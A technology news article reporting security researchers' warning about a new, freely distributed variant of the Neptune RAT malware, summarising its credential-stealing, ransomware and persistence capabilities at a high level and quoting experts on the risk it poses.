A new version of the Neptune RAT malware has emerged, security researchers have warned, and is spreading on GitHub, Telegram, and even YouTube.
The remote access trojan is 'an extremely serious threat' being offered on the ransomware-as-a-service model, according to researchers at Cyfirma.
Affecting Windows devices, it hijacks Chromium-based browsers including Chrome, Brave, and Opera using a Chromium.dll attack that decrypts stored login data and installs itself as a scheduled Windows task.
It includes a crypto clipper and a password stealer with the ability to exfiltrate the credentials of more than 270 different applications, along with ransomware capabilities and live desktop monitoring.
Advanced anti-analysis techniques and persistence methods, such as modifying the Windows Registry and adding tasks to the Task Scheduler, mean it can maintain its presence on the victim’s system for extended periods of time.
"The analysis of the latest version of Neptune RAT reveals a sophisticated and highly dangerous piece of malware designed for persistent, covert operations on Windows systems," Cyfirma researchers said.
"Its ability to generate direct PowerShell commands (using irm and iex) enables seamless delivery and execution, effectively bypassing traditional security measures. It also has the capability to destroy Windows OS and features advanced password-grabbing functionalities."
Neptune RAT lowers the bar for cyber criminals
The new version has been made available without the source code, making analysis more challenging. Notably, it's being offered via an unusual model, with the developer claiming that while it's free to use, there's a more advanced version behind a paywall.
Chris Hauk, consumer privacy advocate at Pixel Privacy, said the emergence of the new Neptune RAT variant shows the “try it before you buy it era of malware has arrived”.
“Neptune RAT is available as a download from GitHub, making it available to a wider variety of internet users than usual," he said.
"As antivirus and anti-malware apps have not yet been able to detect and remove Neptune RAT, internet users will need to stay alert and practice safe computing by not clicking on links or opening attachments that are shared by unknown users."
Paul Bischoff, consumer privacy advocate at Comparitech, echoed Hauk’s comments, noting that the accessibility of the variant will have wide-reaching implications for consumers and enterprises alike and lower the barrier of entry for cyber criminals.
"The maker of Neptune RAT is giving their malware out for free, so it's not just one hacker group we need to worry about," he said.
"Anyone could use it to launch attacks through email, text, ads, or download links. Once the malware has infected a system, it is extremely destructive, dangerous, and hard to remove."
Given its anti-detection features, the new Neptune RAT version is hard to avoid, Cyfirma researchers said, adding that this poses a “significant risk to both individuals and organizations”.
"Continuous monitoring, robust endpoint protection, and proactive threat detection strategies are crucial to mitigating the impact of this malware."
MORE FROM ITPRO
-
Cheap cyber crime kits can be bought on the dark web for less than $25News Research from NordVPN shows phishing kits are now widely available on the dark web and via messaging apps like Telegram, and are often selling for less than $25.
-
Redis unveils new tools for developers working on AI applicationsNews Redis has announced new tools aimed at making it easier for AI developers to build applications and optimize large language model (LLM) outputs.
-
‘Phishing kits are a force multiplier': Cheap cyber crime kits can be bought on the dark web for less than $25 – and experts warn it’s lowering the barrier of entry for amateur hackers
News Research from NordVPN shows phishing kits are now widely available on the dark web and via messaging apps like Telegram, and are often selling for less than $25.
-
Seized database helps Europol snare botnet customers in ‘Operation Endgame’ follow-up stingNews Europol has detained several people believed to be involved in a botnet operation as part of a follow-up to a major takedown last year.
-
Warning issued over ‘fast flux’ techniques used to obscure malicious signals on compromised networksNews Cybersecurity agencies have issued a stark message that too little is being done to sniff out malware hiding in corporate networks
-
Fake file converter tools are on the rise – here’s what you need to knowNews The FBI has issued an alert over the rise of fake file converter tools available online after observing a spate of scams and ransomware attacks.
-
Forget MFA fatigue, attackers are exploiting ‘click tolerance’ to trick users into infecting themselves with malwareNews Threat actors are exploiting users’ familiarity with verification tests to trick them into loading malware onto their systems, new research has warned.
-
A ‘significant increase’ in infostealer malware attacks left 3.9 billion credentials exposed to cyber criminals last year – and experts worry this is a ticking time bomb for enterprisesNews The threat of infostealer malware is on the rise, with 4.3 million machines infected last year alone
-
Why ‘malware as a service’ is becoming a serious problemNews Researchers have issued a warning over the rise of 'malware as a service' platforms amid a surge in attacks over the last year.
-
There’s a new ransomware player on the scene: the ‘BlackLock’ group has become one of the most prolific operators in the cyber crime industry – and researchers warn it’s only going to get worse for potential victimsNews Security experts have warned the BlackLock group could become the most active ransomware operator in 2025
